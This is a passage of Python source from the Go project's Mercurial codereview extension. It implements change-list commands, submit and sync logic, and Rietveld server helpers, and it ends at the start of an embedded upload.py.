	The -d option only removes files from the change list.
	It does not edit them or remove them from the repository.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	pats = tuple([pat] + list(pats))
	if not GoodCLName(clname):
		return "invalid CL name " + clname

	dirty = {}
	cl, err = LoadCL(ui, repo, clname, web=False)
	if err != '':
		return err
	if not cl.local:
		return "cannot change non-local CL " + clname

	files = ChangedFiles(ui, repo, pats)

	# -d: remove the matched files from this CL only.
	if opts["delete"]:
		oldfiles = Intersect(files, cl.files)
		if oldfiles:
			if not ui.quiet:
				# Echo the commands that would reverse this removal.
				ui.status("# Removing files from CL. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				for f in oldfiles:
					ui.status("# hg file %s %s\n" % (cl.name, f))
			cl.files = Sub(cl.files, oldfiles)
			cl.Flush(ui, repo)
		else:
			ui.status("no such files in CL")
		return

	if not files:
		return "no such modified files"

	# Add the matched files, stealing any that belong to other CLs.
	files = Sub(files, cl.files)
	taken = Taken(ui, repo)
	warned = False
	for f in files:
		if f in taken:
			if not warned and not ui.quiet:
				ui.status("# Taking files from other CLs. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				warned = True
			ocl = taken[f]
			if not ui.quiet:
				ui.status("# hg file %s %s\n" % (ocl.name, f))
			if ocl not in dirty:
				# NOTE(review): removes *all* files being moved from the
				# other CL in one shot, not just f; subsequent hits on
				# the same ocl are skipped via the dirty check.
				ocl.files = Sub(ocl.files, files)
				dirty[ocl] = True
	cl.files = Add(cl.files, files)
	dirty[cl] = True
	for d, _ in dirty.items():
		d.Flush(ui, repo)
	return
#######################################################################
# hg gofmt
@hgcommand
def gofmt(ui, repo, *pats, **opts):
	"""apply gofmt to modified files

	Applies gofmt to the modified files in the repository that match
	the given patterns.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	files = ChangedExistingFiles(ui, repo, pats, opts)
	files = gofmt_required(files)
	if not files:
		ui.status("no modified go files\n")
		return
	# gofmt runs in the current directory, so convert repo-relative
	# names to cwd-relative ones.
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	try:
		# --list: only report the files; otherwise rewrite them (-w).
		cmd = ["gofmt", "-l"]
		if not opts["list"]:
			cmd += ["-w"]
		if subprocess.call(cmd + files) != 0:
			raise hg_util.Abort("gofmt did not exit cleanly")
	except hg_error.Abort, e:
		raise
	except:
		raise hg_util.Abort("gofmt: " + ExceptionDetail())
	return
def gofmt_required(files):
	# Select the .go files gofmt should check: everything except test
	# data under test/, with test/bench/ re-included.
	out = []
	for f in files:
		if not f.endswith('.go'):
			continue
		if f.startswith('test/') and not f.startswith('test/bench/'):
			continue
		out.append(f)
	return out
#######################################################################
# hg mail
@hgcommand
def mail(ui, repo, *pats, **opts):
	"""mail a change for review

	Uploads a patch to the code review server and then sends mail
	to the reviewer and CC list asking for a review.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	cl, err = CommandLineCL(ui, repo, pats, opts, op="mail", defaultcc=defaultcc)
	if err != "":
		raise hg_util.Abort(err)
	cl.Upload(ui, repo, gofmt_just_warn=True)
	if not cl.reviewer:
		# If no reviewer is listed, assign the review to defaultcc.
		# This makes sure that it appears in the
		# codereview.appspot.com/user/defaultcc
		# page, so that it doesn't get dropped on the floor.
		if not defaultcc:
			raise hg_util.Abort("no reviewers listed in CL")
		# Don't CC the same addresses we just promoted to reviewer.
		cl.cc = Sub(cl.cc, defaultcc)
		cl.reviewer = defaultcc
		cl.Flush(ui, repo)

	if cl.files == []:
		raise hg_util.Abort("no changed files, not sending mail")

	cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
@hgcommand
def ps(ui, repo, *pats, **opts):
	"""alias for hg p --short
	"""
	# Delegate to pending with the --short flag forced on.
	return pending(ui, repo, *pats, **dict(opts, short=True))
@hgcommand
def pq(ui, repo, *pats, **opts):
	"""alias for hg p --quick
	"""
	# Delegate to pending with the --quick flag forced on.
	return pending(ui, repo, *pats, **dict(opts, quick=True))
@hgcommand
def pending(ui, repo, *pats, **opts):
	"""show pending changes

	Lists pending changes followed by a list of unassigned but modified files.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	quick = opts.get('quick', False)
	short = opts.get('short', False)
	# Skip the slow per-CL web fetch when a fast listing will do.
	m = LoadAllCL(ui, repo, web=not quick and not short)
	for name in sorted(m.keys()):
		cl = m[name]
		if short:
			ui.write(name + "\t" + line1(cl.desc) + "\n")
		else:
			ui.write(cl.PendingText(quick=quick) + "\n")

	if short:
		return 0
	files = DefaultFiles(ui, repo, [])
	if files:
		text = "Changed files not in any CL:\n"
		for f in files:
			text += "\t" + f + "\n"
		ui.write(text)
#######################################################################
# hg submit
def need_sync():
	# Uniform abort used wherever submit detects a stale local repo.
	raise hg_util.Abort("local repository out of date; must sync before submit")
@hgcommand
def submit(ui, repo, *pats, **opts):
	"""submit change to remote repository

	Submits change to remote repository.
	Bails out if the local repository is not in sync with the remote one.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	# We already called this on startup but sometimes Mercurial forgets.
	set_mercurial_encoding_to_utf8()

	if not opts["no_incoming"] and hg_incoming(ui, repo):
		need_sync()

	cl, err = CommandLineCL(ui, repo, pats, opts, op="submit", defaultcc=defaultcc)
	if err != "":
		raise hg_util.Abort(err)

	# A copied CL is committed on behalf of its original author.
	user = None
	if cl.copied_from:
		user = cl.copied_from
	userline = CheckContributor(ui, repo, user)
	typecheck(userline, str)

	# Build the R=/TBR=/CC= trailer appended to the commit message.
	about = ""
	if cl.reviewer:
		about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
	if opts.get('tbr'):
		tbr = SplitCommaSpace(opts.get('tbr'))
		cl.reviewer = Add(cl.reviewer, tbr)
		about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
	if cl.cc:
		about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"

	if not cl.reviewer:
		raise hg_util.Abort("no reviewers listed in CL")

	if not cl.local:
		raise hg_util.Abort("cannot submit non-local CL")

	# upload, to sync current patch and also get change number if CL is new.
	if not cl.copied_from:
		cl.Upload(ui, repo, gofmt_just_warn=True)

	# check gofmt for real; allowed upload to warn in order to save CL.
	cl.Flush(ui, repo)
	CheckFormat(ui, repo, cl.files)

	about += "%s%s\n" % (server_url_base, cl.name)

	if cl.copied_from:
		about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
	typecheck(about, str)

	if not cl.mailed and not cl.copied_from:  # in case this is TBR
		cl.Mail(ui, repo)

	# submit changes locally
	message = cl.desc.rstrip() + "\n\n" + about
	typecheck(message, str)

	set_status("pushing " + cl.name + " to remote server")

	if hg_outgoing(ui, repo):
		raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")

	old_heads = len(hg_heads(ui, repo).split())

	# Temporarily disarm the precommit hook for our own commit.
	global commit_okay
	commit_okay = True
	ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
	commit_okay = False
	if ret:
		raise hg_util.Abort("nothing changed")
	node = repo["-1"].node()

	# push to remote; if it fails for any reason, roll back
	try:
		new_heads = len(hg_heads(ui, repo).split())
		if old_heads != new_heads and not (old_heads == 0 and new_heads == 1):
			# Created new head, so we weren't up to date.
			need_sync()

		# Push changes to remote.  If it works, we're committed.  If not, roll back.
		try:
			if hg_push(ui, repo):
				raise hg_util.Abort("push error")
		except hg_error.Abort, e:
			if e.message.find("push creates new heads") >= 0:
				# Remote repository had changes we missed.
				need_sync()
			raise
		except urllib2.HTTPError, e:
			print >>sys.stderr, "pushing to remote server failed; do you have commit permissions?"
			raise
	except:
		# Undo the local commit before propagating the failure.
		real_rollback()
		raise

	# We're committed. Upload final patch, close review, add commit message.
	changeURL = hg_node.short(node)
	url = ui.expandpath("default")
	# Recognize Google Code hosting URLs to build a changeset link.
	m = re.match("(^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?)" + "|" +
		"(^https?://([^@/]+@)?code\.google\.com/p/([^/.]+)(\.[^./]+)?/?)", url)
	if m:
		if m.group(1): # prj.googlecode.com/hg/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(3), changeURL)
		elif m.group(4) and m.group(7): # code.google.com/p/prj.subrepo/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s&repo=%s" % (m.group(6), changeURL, m.group(7)[1:])
		elif m.group(4): # code.google.com/p/prj/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(6), changeURL)
		else:
			print >>sys.stderr, "URL: ", url
	else:
		print >>sys.stderr, "URL: ", url
	pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message

	# When posting, move reviewers to CC line,
	# so that the issue stops showing up in their "My Issues" page.
	PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))

	if not cl.copied_from:
		EditDesc(cl.name, closed=True, private=cl.private)
	cl.Delete(ui, repo)

	# Leave the release branch if this submit emptied the client there.
	c = repo[None]
	if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
		ui.write("switching from %s to default branch.\n" % releaseBranch)
		err = hg_clean(repo, "default")
		if err:
			return err
	return 0
#######################################################################
# hg sync
@hgcommand
def sync(ui, repo, **opts):
	"""synchronize with remote repository

	Incorporates recent changes from the remote repository
	into the local repository.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	# --local skips the pull/update and only reconciles CL state.
	if not opts["local"]:
		err = hg_pull(ui, repo, update=True)
		if err:
			return err
	sync_changes(ui, repo)
def sync_changes(ui, repo):
	"""Reconcile local CL records after a sync.

	First, close local CLs that Rietveld shows as already submitted
	(detected from the change-log descriptions of recent revisions).
	Then drop files that are no longer locally modified from the
	remaining CLs, warning about CLs left empty.
	"""
	# Look through recent change log descriptions to find
	# potential references to http://.*/our-CL-number.
	# Double-check them by looking at the Rietveld log.
	for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
		desc = repo[rev].description().strip()
		for clname in re.findall('(?m)^https?://(?:[^\n]+)/([0-9]+)$', desc):
			if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
				ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
				cl, err = LoadCL(ui, repo, clname, web=False)
				if err != "":
					ui.warn("loading CL %s: %s\n" % (clname, err))
					continue
				if not cl.copied_from:
					# Only close the Rietveld issue when the CL is ours;
					# copied CLs belong to another owner (see DownloadCL).
					EditDesc(cl.name, closed=True, private=cl.private)
				cl.Delete(ui, repo)

	# Remove files that are not modified from the CLs in which they appear.
	all = LoadAllCL(ui, repo, web=False)
	changed = ChangedFiles(ui, repo, [])
	for cl in all.values():
		extra = Sub(cl.files, changed)
		if extra:
			ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
			for f in extra:
				ui.warn("\t%s\n" % (f,))
			cl.files = Sub(cl.files, extra)
			cl.Flush(ui, repo)
		if not cl.files:
			if not cl.copied_from:
				ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
			else:
				ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
	return 0
#######################################################################
# hg upload
@hgcommand
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
raise hg_util.Abort(err)
if not cl.local:
raise hg_util.Abort("cannot upload non-local change")
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return 0
#######################################################################
# Table of commands, supplied to Mercurial for installation.
# Reviewer-related command-line options shared by the mail and submit
# commands. Each tuple is (short flag, long flag, default, help text),
# the format Mercurial's command table expects.
review_opts = [
	('r', 'reviewer', '', 'add reviewer'),
	('', 'cc', '', 'add cc'),
	('', 'tbr', '', 'add future reviewer'),
	('m', 'message', '', 'change description (for new change)'),
]
# Table of commands, supplied to Mercurial for installation.
# Each entry maps a command name to a (function, option list, synopsis)
# tuple; each option is (short flag, long flag, default, help text).
cmdtable = {
	# The ^ means to show this command in the help text that
	# is printed when running hg with no arguments.
	"^change": (
		change,
		[
			('d', 'delete', None, 'delete existing change list'),
			('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
			('i', 'stdin', None, 'read change list from standard input'),
			('o', 'stdout', None, 'print change list to standard output'),
			('p', 'pending', None, 'print pending summary to standard output'),
		],
		"[-d | -D] [-i] [-o] change# or FILE ..."
	),
	"^clpatch": (
		clpatch,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# Would prefer to call this codereview-login, but then
	# hg help codereview prints the help for this command
	# instead of the help for the extension.
	"code-login": (
		code_login,
		[],
		"",
	),
	"^download": (
		download,
		[],
		"change#"
	),
	"^file": (
		file,
		[
			('d', 'delete', None, 'delete files from change list (but not repository)'),
		],
		"[-d] change# FILE ..."
	),
	"^gofmt": (
		gofmt,
		[
			('l', 'list', None, 'list files that would change, but do not edit them'),
		],
		"FILE ..."
	),
	"^pending|p": (
		pending,
		[
			('s', 'short', False, 'show short result form'),
			('', 'quick', False, 'do not consult codereview server'),
		],
		"[FILE ...]"
	),
	"^ps": (
		ps,
		[],
		"[FILE ...]"
	),
	"^pq": (
		pq,
		[],
		"[FILE ...]"
	),
	"^mail": (
		mail,
		review_opts + [
		] + hg_commands.walkopts,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^release-apply": (
		release_apply,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# TODO: release-start, release-tag, weekly-tag
	"^submit": (
		submit,
		review_opts + [
			('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
		] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^sync": (
		sync,
		[
			('', 'local', None, 'do not pull changes from remote repository')
		],
		"[--local]",
	),
	"^undo": (
		undo,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	"^upload": (
		upload,
		[],
		"change#"
	),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
	"""(disabled when using this extension)"""
	# Installed over repo.rollback by reposetup: rollback would remove an
	# existing commit behind the extension's back, so direct users to hg undo.
	raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
# Set to True by the first reposetup call; later calls (made for the
# remote repositories we pull from or push to) return immediately.
codereview_init = False
def reposetup(ui, repo):
	"""Mercurial reposetup hook: initialize the codereview extension.

	Reads repository-specific options from codereview.cfg, validates
	the default remote path, installs the precommit hook, and disables
	rollback. Sets the module-level codereview_disabled message (and
	returns early) instead of raising when the repository cannot be
	used with this extension.
	"""
	global codereview_disabled
	global defaultcc

	# reposetup gets called both for the local repository
	# and also for any repository we are pulling or pushing to.
	# Only initialize the first time.
	global codereview_init
	if codereview_init:
		return
	codereview_init = True
	start_status_thread()

	# Read repository-specific options from lib/codereview/codereview.cfg or codereview.cfg.
	root = ''
	try:
		root = repo.root
	except:
		# Yes, repo might not have root; see issue 959.
		codereview_disabled = 'codereview disabled: repository has no root'
		return

	repo_config_path = ''
	p1 = root + '/lib/codereview/codereview.cfg'
	p2 = root + '/codereview.cfg'
	if os.access(p1, os.F_OK):
		repo_config_path = p1
	else:
		repo_config_path = p2
	try:
		f = open(repo_config_path)
		# Close the config file even if a read fails mid-loop;
		# the original code leaked this file handle.
		try:
			for line in f:
				if line.startswith('defaultcc:'):
					defaultcc = SplitCommaSpace(line[len('defaultcc:'):])
				if line.startswith('contributors:'):
					global contributorsURL
					contributorsURL = line[len('contributors:'):].strip()
		finally:
			f.close()
	except:
		codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
		return

	remote = ui.config("paths", "default", "")
	if remote.find("://") < 0:
		raise hg_util.Abort("codereview: default path '%s' is not a URL" % (remote,))

	InstallMatch(ui, repo)
	RietveldSetup(ui, repo)

	# Disable the Mercurial commands that might change the repository.
	# Only commands in this extension are supposed to do that.
	ui.setconfig("hooks", "precommit.codereview", precommithook)

	# Rollback removes an existing commit. Don't do that either.
	global real_rollback
	real_rollback = repo.rollback
	repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
	"""HTML form parser.

	Collects the name/value pairs of <input> and <textarea> elements
	into self.map; used to scrape Rietveld's edit/publish forms so
	they can be re-submitted with modified fields (see GetForm).
	"""
	def __init__(self):
		self.map = {}		# field name -> field value
		self.curtag = None	# name of the <textarea> currently being read, if any
		self.curdata = None	# accumulated text of that <textarea>
		HTMLParser.__init__(self)
	def handle_starttag(self, tag, attrs):
		# An <input> contributes its value attribute immediately;
		# a <textarea> starts accumulating character data instead.
		if tag == "input":
			key = None
			value = ''
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
				if a[0] == 'value':
					value = a[1]
			if key is not None:
				self.map[key] = value
		if tag == "textarea":
			key = None
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
			if key is not None:
				self.curtag = key
				self.curdata = ''
	def handle_endtag(self, tag):
		# Closing a <textarea> commits the accumulated data.
		if tag == "textarea" and self.curtag is not None:
			self.map[self.curtag] = self.curdata
			self.curtag = None
			self.curdata = None
	def handle_charref(self, name):
		# Numeric character reference, e.g. &#65;
		self.handle_data(unichr(int(name)))
	def handle_entityref(self, name):
		# Named entity, e.g. &amp;. Unknown entities pass through verbatim.
		import htmlentitydefs
		if name in htmlentitydefs.entitydefs:
			self.handle_data(htmlentitydefs.entitydefs[name])
		else:
			self.handle_data("&" + name + ";")
	def handle_data(self, data):
		# Only collect data while inside a named <textarea>.
		if self.curdata is not None:
			self.curdata += data
def JSONGet(ui, path):
	"""Fetch path from the Rietveld server and return the decoded JSON
	value (normalized by fix_json), or None after a warning on failure.
	"""
	try:
		data = MySend(path, force_auth=False)
		typecheck(data, str)
		d = fix_json(json.loads(data))
	except:
		# Deliberate catch-all: any network/decoding failure is reported
		# to the user and converted into a None result.
		ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
		return None
	return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
# Clean up json parser output to match our expectations:
#   * all strings are UTF-8-encoded str, not unicode.
#   * missing fields are missing, not None,
#     so that d.get("foo", defaultvalue) works.
def fix_json(x):
	"""Recursively normalize a json.loads result in place and return it."""
	t = type(x)
	if t in [str, int, float, bool, type(None)]:
		pass
	elif t is unicode:
		x = x.encode("utf-8")
	elif t is list:
		# Mutate the list in place so identity is preserved.
		for i, elem in enumerate(x):
			x[i] = fix_json(elem)
	elif t is dict:
		# Normalize values first, then drop the None-valued keys.
		dead = []
		for k in x:
			if x[k] is None:
				dead.append(k)
			else:
				x[k] = fix_json(x[k])
		for k in dead:
			del x[k]
	else:
		raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
	if type(x) is str:
		x = x.replace('\r\n', '\n')
	return x
def IsRietveldSubmitted(ui, clname, hex):
	"""Report whether Rietveld shows CL clname as submitted at revision hex."""
	issue = JSONGet(ui, "/api/" + clname + "?messages=true")
	if issue is None:
		return False
	# Rietveld records submission with a "*** Submitted as <rev> ***" message.
	submitted = re.compile('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*')
	for msg in issue.get("messages", []):
		m = submitted.match(msg.get("text", ""))
		if m is None:
			continue
		rev = m.group(1)
		# Require a reasonably long prefix to avoid accidental matches.
		if len(rev) >= 8 and hex.startswith(rev):
			return True
	return False
def IsRietveldMailed(cl):
	"""Report whether the Rietveld issue for cl has been mailed for review.

	Rietveld adds a message containing the standard "I'd like you to
	review this change" boilerplate when the review request is sent.
	"""
	needle = "I'd like you to review this change"
	return any(needle in msg.get("text", "") for msg in cl.dict.get("messages", []))
def DownloadCL(ui, repo, clname):
	"""Download CL metadata and the latest patch set from Rietveld.

	Returns a (cl, vers, diffdata, err) tuple: the loaded CL object,
	the base revision the diff was taken against (parsed from the
	patchset message, "" if unknown), the raw diff text, and an error
	string ("" on success; on failure the other three are None).
	"""
	set_status("downloading CL " + clname)
	cl, err = LoadCL(ui, repo, clname, web=True)
	if err != "":
		return None, None, None, "error loading CL %s: %s" % (clname, err)

	# Find most recent diff
	diffs = cl.dict.get("patchsets", [])
	if not diffs:
		return None, None, None, "CL has no patch sets"
	patchid = diffs[-1]

	patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
	if patchset is None:
		return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
	if patchset.get("patchset", 0) != patchid:
		return None, None, None, "malformed patchset information"

	# The patchset message looks like "diff -r <rev> ..."; pull out <rev>
	# as the base version the diff applies to.
	vers = ""
	msg = patchset.get("message", "").split()
	if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
		vers = msg[2]
	diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"

	diffdata = MySend(diff, force_auth=False)

	# Print warning if email is not in CONTRIBUTORS file.
	email = cl.dict.get("owner_email", "")
	if not email:
		return None, None, None, "cannot find owner for %s" % (clname)
	him = FindContributor(ui, repo, email)
	me = FindContributor(ui, repo, None)
	if him == me:
		cl.mailed = IsRietveldMailed(cl)
	else:
		# The CL belongs to someone else; remember whose it is.
		cl.copied_from = email

	return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Run MySend1 maybe twice, because Rietveld is unreliable."""
	try:
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
	except Exception, e:
		# Retry exactly once, and only for server-side HTTP 500 errors;
		# anything else propagates to the caller.
		if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
			raise
		print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
		time.sleep(2)
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Sends an RPC and returns the response.

	Args:
		request_path: The path to send the request to, eg /api/appversion/create.
		payload: The body of the request, or None to send an empty request.
		content_type: The Content-Type header to use.
		timeout: timeout in seconds; default None i.e. no timeout.
			(Note: for large requests on OS X, the timeout doesn't work right.)
		kwargs: Any keyword arguments are converted into query string parameters.

	Returns:
		The response body, as a string.
	"""
	# TODO: Don't require authentication.  Let the server say
	# whether it is necessary.
	global rpc
	if rpc == None:
		# Lazily create the shared RPC server on first use.
		rpc = GetRpcServer(upload_options)
	self = rpc
	if not self.authenticated and force_auth:
		self._Authenticate()
	if request_path is None:
		return

	if timeout is None:
		timeout = 30 # seconds

	old_timeout = socket.getdefaulttimeout()
	socket.setdefaulttimeout(timeout)
	try:
		tries = 0
		while True:
			tries += 1
			args = dict(kwargs)
			url = "https://%s%s" % (self.host, request_path)
			if args:
				url += "?" + urllib.urlencode(args)
			req = self._CreateRequest(url=url, data=payload)
			req.add_header("Content-Type", content_type)
			try:
				f = self.opener.open(req)
				response = f.read()
				f.close()
				# Translate \r\n into \n, because Rietveld doesn't.
				response = response.replace('\r\n', '\n')
				# who knows what urllib will give us
				if type(response) == unicode:
					response = response.encode("utf-8")
				typecheck(response, str)
				return response
			except urllib2.HTTPError, e:
				if tries > 3:
					raise
				elif e.code == 401:
					# Missing or stale credentials: log in and retry.
					self._Authenticate()
				elif e.code == 302:
					# Only treat a redirect to the Google login page as an
					# authentication request; other redirects return "".
					loc = e.info()["location"]
					if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
						return ''
					self._Authenticate()
				else:
					raise
	finally:
		# Restore the process-wide socket timeout whatever happens.
		socket.setdefaulttimeout(old_timeout)
def GetForm(url):
	"""Fetch url from Rietveld and return its HTML form fields
	as a str->str dict (field name -> current value)."""
	parser = FormParser()
	parser.feed(ustr(MySend(url)))	# feed() wants unicode
	parser.close()
	# Convert back to UTF-8 str and normalize line endings.
	fields = {}
	for name, value in parser.map.items():
		fields[name.encode("utf-8")] = value.replace("\r\n", "\n").encode("utf-8")
	return fields
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
	"""Update metadata on Rietveld issue *issue* via its edit form.

	Only fields whose argument is not None (or True, for the two
	booleans) are changed; every other field keeps the value already
	present in the fetched form. Exits the process on server error.
	"""
	set_status("uploading change to description")
	form_fields = GetForm("/" + issue + "/edit")
	if subject is not None:
		form_fields['subject'] = subject
	if desc is not None:
		form_fields['description'] = desc
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if closed:
		form_fields['closed'] = "checked"
	if private:
		form_fields['private'] = "checked"
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/edit", body, content_type=ctype)
	# Rietveld replies with an empty body on success.
	if response != "":
		print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
		sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
# Empty attribute bag used to mimic upload.py's parsed command-line
# options object; RietveldSetup fills in one of these as upload_options.
class opt(object):
	pass
def RietveldSetup(ui, repo):
	"""Initialize the Rietveld (upload.py) globals from Mercurial config.

	Reads the [codereview] section of the hg configuration and fills in
	the module-level server, server_url_base, upload_options, rpc, and
	releaseBranch globals used by the rest of the extension.
	"""
	global force_google_account
	global rpc
	global server
	global server_url_base
	global upload_options
	global verbosity

	if not ui.verbose:
		verbosity = 0

	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x

	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x

	server_url_base = "https://" + server + "/"

	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)

	# Fake upload.py options object; most fields stay at their defaults.
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = None
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True

	if testing:
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"

	rpc = None

	global releaseBranch
	tags = repo.branchtags().keys()
	if 'release-branch.go10' in tags:
		# NOTE(rsc): This tags.sort is going to get the wrong
		# answer when comparing release-branch.go9 with
		# release-branch.go10. It will be a while before we care.
		raise hg_util.Abort('tags.sort needs to be fixed for release-branch.go10')
	tags.sort()
	# Keep the lexically largest release-branch.go* tag.
	for t in tags:
		if t.startswith('release-branch.go'):
			releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
# (RietveldSetup resets this to 0 unless hg is run with --verbose.)
verbosity = 1

# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024

# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
	'application/javascript',
	'application/x-javascript',
	'application/x-freemind'
]
def GetEmail(prompt):
	"""Prompts the user for their email address and returns it.

